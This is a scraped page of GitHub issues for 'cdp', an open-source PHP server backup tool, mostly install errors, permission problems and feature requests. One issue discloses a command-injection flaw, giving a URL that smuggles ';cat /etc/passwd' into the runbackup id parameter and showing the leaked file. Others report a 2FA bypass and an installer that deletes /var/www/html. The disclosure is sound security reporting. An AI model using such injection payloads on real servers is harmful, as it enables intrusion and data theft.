petabyet / cdp Goto Github PK
View Code? Open in Web Editor NEWSimple & Open Source Server Backups
Home Page: https://cdp.me
License: GNU General Public License v2.0
Simple & Open Source Server Backups
Home Page: https://cdp.me
License: GNU General Public License v2.0
can not chdir(/var/spool/clientmqueue/): Permission denied
Message could not be sent.
Mailer Error: Could not instantiate mail function.
I'm having the issue that when 2 factor authentication is enabled, I can still login without using the generated token.
simple_html_dom is a very old library with several bugs and is un-maintained. I recommend that the querypath library be used. It is actively maintained and uses jQuery API's.
https://github.com/technosophos/querypath
Thanks.
Very little feedback during the install process, but I get:
UPDATING YOUR SYSTEM, followed by
RPMDB altered outside of Yum, which I know I can ignore, but then after a long wait, I see a few rm statements followed by "no such file or directory...." and the console hangs. I left my SSH session up for two hours, with no progress,
If this issue is due to me trying to install via an SSH session, then you need to specify that this needs to be done via CONSOLE ONLY in your instructions.
I setted a backup job to backup a folder about 3.4G, auto-delete was set to 30 days.
But it didn't do a full backup every 30 days, all files under /var/www/files are small than 60M.
There is no full version backup.
I don't know how restore works but 30*60M < 3.4G
I think it need to keep two full version backup to make it possible to restore to any given day within 30 days.
Please, make CDP provide a way to see the files inside backups and restore backups in a per file/dir way Ex.: I want to see if /etc/any.conf exists and restore it to the original node or for other.
Tar provides a way to list all files inside a tarball. You can find it at tar man(1) doc:
tar -tvf archive.tar
# List all files in archive.tar verbosely.
This should work for compressed files as well. Just put the flag that matches the compression algorithm that you have used:
$ tar -ztvf sometarfile.tar.gz
or
$ tar -jtvf sometarfile.tar.bz2
or any other algorithm.
If you are compressing with gzip or just putting files together without compressing it, you can use less:
$ less sometarfile.tar.gz
Less provides a very graceful output, just like ls -l
. And tar does have a function to pull just one file or directory from one archive too:
$ tar -zxvf sometarfile.tar.gz somedir/subdir/justafile
If you want to pull a dir you just use the same command but point to the dir path inside the tar file. Note that you dont use a / at the beginning of the internat tar dir path:
$ tar -zxvf sometarfile.tar.gz somedir/subdir/
This works for any compression algo. used to compress the tarball. You can extract all files that match a wildcard inside the tar file:
tar -zxvf sometarfile.tar.gz --wildcards --no-anchored '*.conf'
Or the same wildcard inside a specific dir:
tar -zxvf sometarfile.tar.gz somedir/subdir/ --wildcards '*.conf'
Thank you for your time.
have tried two different Servers (different locations with Debian/ubuntu fresh install + cdp) to backup whole Linux Clients (source "/")
when i try to create a manual backup gzip stops at around 113 mb and no data gets transfered. have tried to backup 2 different Linux Clients (haphost and core i7 6gb ram ...
can anyone help me?
It would be nice to have a mysql backup give the option of backing up all databases, maybe by specifying a defined keyword in the directories text box.
I can code this, if you would like to .
When I edit the password of an user or add a new user in user management, I am not able to log me in with this data. Even if the password and the username is right. I can't log me in.
I get only this error: Login failed.
I recommend that when you get to a point that you think this app needs a rewrite, that you look at using a framework to structure it. I personally use Yii2, but there are many options.
MVC keeps things very clean and generally frameworks help prevent common security holes.
In a VM of Ubuntu 14.04 server, freshly installed.
In the command you suggest will not work, '-q0' isn t recognized by wget.
Then in the script, '-s' and '-n' isn t recognized by read.
the home page "Last 10 Backup Logs" show error as a "No such file"
file_get_contents(/var/www/xxx/public/cdp/includes/db-backuplog.json): failed to open stream: No such file or directory in /var/www/xxx/public/cdp/includes/home.php on line 69
and yes there's indeed no such file.
it backup cpanel but cant see if i click view backup
/dev/fd/63: line 122: curl: command not found
Update your script to also install curl :)
will it support multi user and support backup to backblaze?
It doesn't really matter if someone goes directly to your config.php file, as it should never "echo" anything out to the page. However, if you must deny access to files such as this being viewed directly, consider doing this better as such:
In index.php (or the normal entry points):
define('CDP', true);
In files you want to deny direct access to:
if (!defined('CDP'))
exit; // Show a 403 here?
You should not wrap your entire script in an if, just bail out!
When attempting to restore I get
`Backup restore job (cdpme-2016-08-24-09-29-01-79c6aec5d961f136cf3014e9c6407ffd.tar.gz) started
Initiating backup restore...
1Transferring the file
tar (child): /cdpme-2016-08-24-09-29-01-79c6aec5d961f136cf3014e9c6407ffd.tar.gz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
Success! Backup restored.`
The file cdpme-2016-08-24-09-29-01-79c6aec5d961f136cf3014e9c6407ffd.tar.gz exists in /var/www/files
Instead of tar gzip compression, how about support for parallel multi-threaded compression such as pigz (parallel gzip) and lbzip2 and pbzip2 http://vbtechsupport.com/1614/ ?
Hello,
I've setup CDP.me test environment.
I'm trying to do Full backup via web interface (Backup Now) and it doesn't work, but If I try manually run cron.php via terminal it works well.
I noticed difference in cdp debug output...
Web output:
/root/test.file
1
Backup completed in 9 seconds.
Processing backup auto-delete
Terminal output:
/root/test.file
1
1
1
Backup completed in 14 seconds.
Processing backup auto-delete
When you select MySQL, I want to backup all DBs but it says I must enter at least 1DB even though it says Leave tables empty if you want a backup of all tables.
Some 'minimal' install don't include wget and curl on default.
error after installing cdp
/dev/fd/63: line 122: curl: command not found
how about add curl and wget on apt-get (line 43) / yum (line 63)?
When running a file backup i'm getting the error
Fatal error: Allowed memory size of 3145728000 bytes exhausted (tried to allocate 1773227473 bytes) in /var/www/html/libs/phpseclib/Crypt/Base.php on line 1350
What settings would need to be changed to correct this
Thanks
this script has many bugs a list of them:
Create another repo to put the install script inside. That way other users can contribute with it as well and you make more clear to everyone what you are doing to it, when and how. It's not a difficult job, so, i hope that you accept this advice :)
Hello,
When trying to backup a database on a remote server im getting the below error
Warning: mysql_connect(): Lost connection to MySQL server at 'reading initial communication packet', system error: 0 in /var/www/html/cron.php on line 211
Message has been sent
I can telnet into the remote server on port 3306 / ping / checked password
Cheers
Hi!
Just a thought a naming, in the User edit form a button is labeled Submit. Most other places would use Save as the label for this.
Consider changing the field label Google Authenticator Key to 2-Factor Authentication Key as Google Authenticator is not the only application that can generate OTP. I personally like Authy as you can sync your accounts between devices and protect the app with a password or pin.
Thanks for your time and work on CDP!
Frederick
Hi!
I have still to make one backup with this program I tried via ssh and it is not working I will fill a separate issue for this if needed. I am still trying to get some output as to why this is not working.
I am getting the following in the email after the backup attempt.
Backup job (8543a3c0704cfb6d3b8eff592ca6539d) started
Starting cPanel backup
Backup started, waiting for it to finish
Backup found, continuing
Creating temporary FTP account for backup transfer
Temporary FTP Account created
Error downloading backup
I ran this via the cron jobs in Webmin which gave this helpful information:
Output from command /usr/bin/php /home/meos/domains/cdp.meosch.tk/public_html/cron.php 8543a3c0704cfb6d3b8eff592ca6539d ..
Array
(
[type] => 2
[message] => ftp_get(): Error opening cdpme-2016-01-22-19-35-31-backup-1.22.2016_19-15-25_meosch.tar.gz
[file] => /home/meos/domains/cdp.meosch.tk/public_html/cron.php
[line] => 474
)
Message has been sent
I investigated and found that 3 backup files had been created but not with the full file name like above: cdpme-2016-01-22-19-35-31-backup-1.22.2016_19-15-25_meosch.tar.gz
$ ls -l |grep .tar.gz
-rw------- 1 meosch meosch 2678233622 Jan 22 20:20 backup-1.22.2016_19-15-25_meosch.tar.gz
-rw------- 1 meosch meosch 2678206087 Jan 22 20:38 backup-1.22.2016_19-33-42_meosch.tar.gz
-rw------- 1 meosch meosch 2678263759 Jan 22 20:40 backup-1.22.2016_19-35-31_meosch.tar.gz
$
cdpme-2016-01-22-19-35-31-backup-1.22.2016_19-15-25_meosch.tar.gz is not equal to backup-1.22.2016_19-15-25_meosch.tar.gz
Not sure were I could have configure this wrong that it would do this.
An help in getting this working would be appreciated!
Frederick
kwt
Can you please write an Alias Feature, instead of selecting IP Address From Drop Down have it as
Server1 - (IP Address)will make it a lot easier to select Servers to Backup.
after add backup jobs, run as root manually with command is OK, but click the Backup Now in the job, always fail, seems permission issue when create backup .tar.gz file under files folder.
I've already chmod 777 files, and chown -R www-data:www-data to the cdp folder,
also enable the fopen in php.ini as below.
allow_url_fopen = On
allow_url_include = On
but always failed, any suggestion how to configure the permission?
Backup task is running in the background
Warning: fopen(cdpme-2014-11-12-06-47-20-4bfbb1c2f*********f5f61fb5a.tar.gz): failed to open stream: Permission denied in /var/www/****/public/cdp/phpseclib/Net/SFTP.php on line 2026
Warning: rename(cdpme-2014-11-12-06-47-20-4bfbb1c2f*********f5f61fb5a.tar.gz,/var/www/**/public/cdp/files/cdpme-2014-11-12-06-47-20-4bfbb1c2f*******f5f61fb5a.tar.gz): No such file or directory in /var/www/****/public/cdp/cron.php on line 130
Warning: filesize(): stat failed for /var/www//public/cdp/files/cdpme-2014-11-12-06-47-20-4bfbb1c2f**_f5f61fb5a.tar.gz in /var/www/_**/public/cdp/cron.php on line 139
Simple enough really, if you require GD, check for it.
if (!function_exists('gd_info')){
die('PHP Extension GD is required!');
};
Backup task has been started, please do not close this window
Warning: fopen(cdpme-2014-12-07-22-49-28-eb57afb248107.tar.gz): failed to open stream: Permission denied in /var/www/libs/phpseclib/Net/SFTP.php on line 2026
Warning: rename(cdpme-2014-12-07-22-49-28-eb57afbab88107.tar.gz,/var/www/files/cdpme-2014-12-07-22-49-28-eb5104c07.tar.gz): No such file or directory in /var/www/cron.php on line 186
Warning: file_get_contents(/var/www/files/cdpme-2014-12-07-22-49-28-eb57afb18107.tar.gz): failed to open stream: No such file or directory in /var/www/cron.php on line 191
Message has been sent
Hi!
Please consider adding the option to download the Cpanel backup files via SSH as an alternative to the current FTP option.
Thanks for considering this!
Frederick
I know that this is at your ToDo list for CDP, so I want to present you a really good way to make the backup replication using Unison ( http://www.cis.upenn.edu/~bcpierce/unison/ ). Unison is a tool that is available for Windows and present at the repositories of many flavors of Unix (Solaris, Linux, OS X, etc.) systems.
So, I will consider that you already have Unison installed (or know how to do this).
First of all you need to setup the UNISON environment variable at path to make sure that UNISON will look for *.prf (profile) files at the correct location, most preferable one that isn't world readable. So we will create the unison
directory under /etc/
and add the UNISON variable to the env.:
# mkdir -p /etc/unison/
# touch /etc/profile.d/unison.sh
# echo '#!/usr/bin/env bash' >> /etc/profile.d/unison.sh && echo 'UNISON=/etc/unison/' >> /etc/profile.d/unison.sh
# chmod +x /etc/profile.d/unison.sh
After that, we need to create a *.prf file to tell unison what will we ask him to do. This files are pretty simple to build and can make unison replicate the backups for more that one server at once. Let me show you a example. First of all we will create the .prf file inside of the /etc/unison/ directory:
# We will set here all directories that we will use
root = /var/www/html/files/my_server_backup_dir
root = ssh://[email protected]//directory/at/other/server
root = ssh://[email protected]//directory/at/other/server
# Obviously, to use SSH without passwords you need to pass the SSH keys to unison and any other SSH argument needed to make a connection to your remote servers.
# If you have a passphrase at your key, you will need to setup ssh-agent or keychain to provide it.
sshargs = -i /home/user/.ssh/id_rsa -p 2222
# As we want just one-way mirroring from this to the other servers, specify the source replica using "force" as follows.
# Note that the directory that you write here should be present as a root above.:
force = /var/www/html/files/my_server_backup_dir
# We want Unison to run without any user input so we will use "batch" mode.
batch = true
# We don't want to be prompted and will just accept Unison's recommendation:
auto = true
# We will make the times (but not directory modtimes) be propagated.
times = true
Save this file as /etc/unison/myfirstserver.com.prf
and now you can sync the files at this directory to all server pointed at the *.prf using:
unison myfirstserver.com
This should provide a exit just like that:
Contacting server...
Connected [//local//home/alice/sync_folder -> //remote_host//home/alice/sync_folder]
Looking for changes
Waiting for changes from server
Reconciling changes
new file --> document1.pdf
<-- new file my.jpg
Propagating updates
UNISON 2.40.63 started propagating changes at 21:19:13.65 on 20 Sep 2013
[BGN] Copying document1.pdf from /var/www/html/files/my_server_backup_dir to my-other-server.info//directory/at/other/server
[BGN] Copying my.jpg from //remote_host//home/alice/sync_folder to /home/alice/sync_folder
[END] Copying my.jpg
[END] Copying document1.pdf
UNISON 2.40.63 finished propagating changes at 21:19:13.68 on 20 Sep 2013
Saving synchronizer state
Synchronization complete at 21:19:13 (2 items transferred, 0 skipped, 0 failed)
Unison will sync the file permissions and owner:group by default. So, if you are transfering files that will be put at a protected directory, the user that you are using to login at the SSH needs to have the right permissions. You can use all this options directly from a big command line, but this isn't really recomended.
This could be used to make the backup restauration as well. You just need to change the root
options to match what you need.
Hi there,
I dont mean to sound rude, but in my opinion its extremely bad practice to do any shell_exec on php code, there are many ways you can go about avoiding this among your project.
There are a fair few holes in the project and a bunch of real bad practices too, I would suggest to relook at the code base if you plan on hiding this as more then just a prototype/POC project but actual production friendly :)
Anyways for proof of concept when a user is logged in:
http://123.123.123.123/index.php?action=runbackup&id=;%20cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
messagebus:x:102:103::/var/run/dbus:/bin/false
All the best :)
Please kindly let me know if there is any fix for this as im getting on two nodes same error:
Backup job (a4add846bb3813066b8ec61e1be0e379) started
Starting OpenVZ backup
OpenVZ detected
vzdump detected
ProxMox detected
Backing up CT 101
Unknown option: mode
usage: /usr/sbin/vzdump OPTIONS [--all | VMID]
--exclude VMID exclude VMID (assumes --all)
--exclude-path REGEX exclude certain files/directories
--stdexcludes exclude temorary files and logs
--compress compress dump file (gzip)
--dumpdir DIR store resulting files in DIR
--maxfiles N maximal number of backup files per VM
--script FILENAME execute hook script
--storage STORAGE_ID store resulting files to STORAGE_ID (PVE only)
--tmpdir DIR store temporary files in DIR
--mailto EMAIL send notification mail to EMAIL.
--quiet be quiet.
--stop stop/start VM if running
--suspend suspend/resume VM when running
--snapshot use LVM snapshot when running
--size MB LVM snapshot size
--node CID only run on pve cluster node CID
--lockwait MINUTES maximal time to wait for the global lock
--stopwait MINUTES maximal time to wait until a VM is stopped
--bwlimit KBPS limit I/O bandwidth; KBytes per second
mv: cannot stat `vzdump-openvz-*.tgz': No such file or directory
vzdump-101.tgz not found
Apr 14 14:04:25 eu sshd[524398]: pam_unix(sshd:session): session opened for user root by (uid=0)
Apr 14 21:35:24 eu sshd[950575]: Received disconnect from 192.168.1.1: 11:
Hey PetaByet, great script. After I chown -R apache:apache /var/www/html/ everything was working great. The script pulls the remote directory we specify. However we have been unable to get your CDP.me script to actually pull down MySQL (we have everything configured correctly for remote access on the other side).
It will only pull the first 339 bytes of the MySQL database:
DROP TABLE wp_yith_wcwl;
CREATE TABLE wp_yith_wcwl ( ID int(11) NOT NULL AUTO_INCREMENT, prod_id int(11) NOT NULL, quantity int(11) NOT NULL, user_id int(11) NOT NULL, dateadded timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (ID), KEY product (prod_id) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
The e-mail report says:
Backup job (df340171bc723ec40ac5b19de0b5fc23) started Starting SQL backup MySQL query error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
We are running MySQL 5.5 with cPanel on this specific test server.
Thank you.
Hi!
Editing users currently does not work as expected. I see the following issues:
[{"id":"1","username":"admin","password":"da7409e901e899b2d03e08ca2dbf6eea","acl":"1","2fo":"false","2fokey":""}]
[{"id":"1","username":"Backupadmin","password":"d41d8cd98f00b204e9800998ecf8427e","acl":"1","2fo":"true","2fokey":""}]
CDP tries to encrypt a blank password #33 is a related issue.
The way things are now any change to the users account by clicking the submit button will mean that a new 2-Factor Authentication key must be generated and then entered into the app that your are using to generate the OTP.
I hope this is all understandable and helpful!
Frederick
When editing a user in the 'Users' page, the password box says "Only enter if you want to change the password". If this is left as blank, CDP will try to encrypt a blank password (or some other behaviour), changing the password hash and locking you out.
I installed cdp on fresh server, and add server from ovz, mysql to cpanel and create Backup Jobs, i added and cron jobs for all backup jobs but none of the backups cant finish example logs are below
Backup completed in 44 seconds.
Processing backup auto-delete
but on cdp.me panel that backup give none file found
this is log for cpanel
Starting cPanel backup
Backup started, waiting for it to finish
Backup is not available yet, waiting 30 seconds and re-try.
Re-trying
Backup found, continuing
Creating temporary FTP account for backup transfer
Temporary FTP Account created
Error downloading backup
same or simillar is for any type of backup that I try...
Can you tell me what is problem, or how to solve this.
P.S. Backup server IP adress is whitelisted on all servers for backup,
Something like this in the installation script:
cd /var/www/
git clone https://github.com/PetaByet/cdp.git
rm -rf html
mv cdp html
So if you have a website running in /var/www/html, it will be vaporized.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.